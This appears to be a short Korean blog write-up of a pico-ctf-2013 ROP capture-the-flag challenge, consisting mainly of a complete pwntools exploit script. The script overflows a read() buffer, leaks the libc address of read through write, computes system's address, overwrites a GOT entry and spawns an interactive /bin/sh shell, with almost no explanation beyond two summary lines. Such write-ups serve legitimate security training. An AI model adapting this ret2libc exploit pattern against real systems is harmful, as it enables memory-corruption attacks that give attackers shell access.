1. write, read 함수사용
2. read()에서 bof 발생하여 rop로 해결
exploit code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | from pwn import *read_plt = 0x8048380read_got = 0x804a000write_plt = 0x80483d0write_got = 0x804a014bss = 0x804a024system_offset = 0x9ad60pppr = 0x804859dpr = 0x8048364binsh = "/bin/sh"p = process("./rop1-fa6168f4d8eba0eb")payload = "A"*140payload += p32(write_plt)payload += p32(pppr)payload += p32(1)payload += p32(read_got)payload += p32(4)payload += p32(read_plt)payload += p32(pppr)payload += p32(0)payload += p32(bss)payload += p32(len(binsh)+1)payload += p32(read_plt)payload += p32(pppr)payload += p32(0)payload += p32(write_got)payload += p32(4)payload += p32(write_plt)payload += p32(pr) payload += p32(bss)log.info("Exploit..!")p.sendline(payload)read_addr = u32(p.recv()[-4:])log.info("read_addr = {}".format(hex(read_addr)))system_addr = read_addr - system_offsetlog.info("system_addr = {}".format(hex(system_addr)))p.sendline(binsh)p.sendline(p32(system_addr))p.interactive() |
'CTF' 카테고리의 다른 글
| pico-ctf-2013 rop-4 (0) | 2018.07.17 |
|---|---|
| pico-ctf-2013 rop-3 (0) | 2018.07.14 |
| pico-ctf-2013 rop-2 (0) | 2018.07.14 |
| PlaidCTF 2013 ropasaurusrex (0) | 2018.07.14 |
| Defcon 2015 r0pbaby (0) | 2018.07.13 |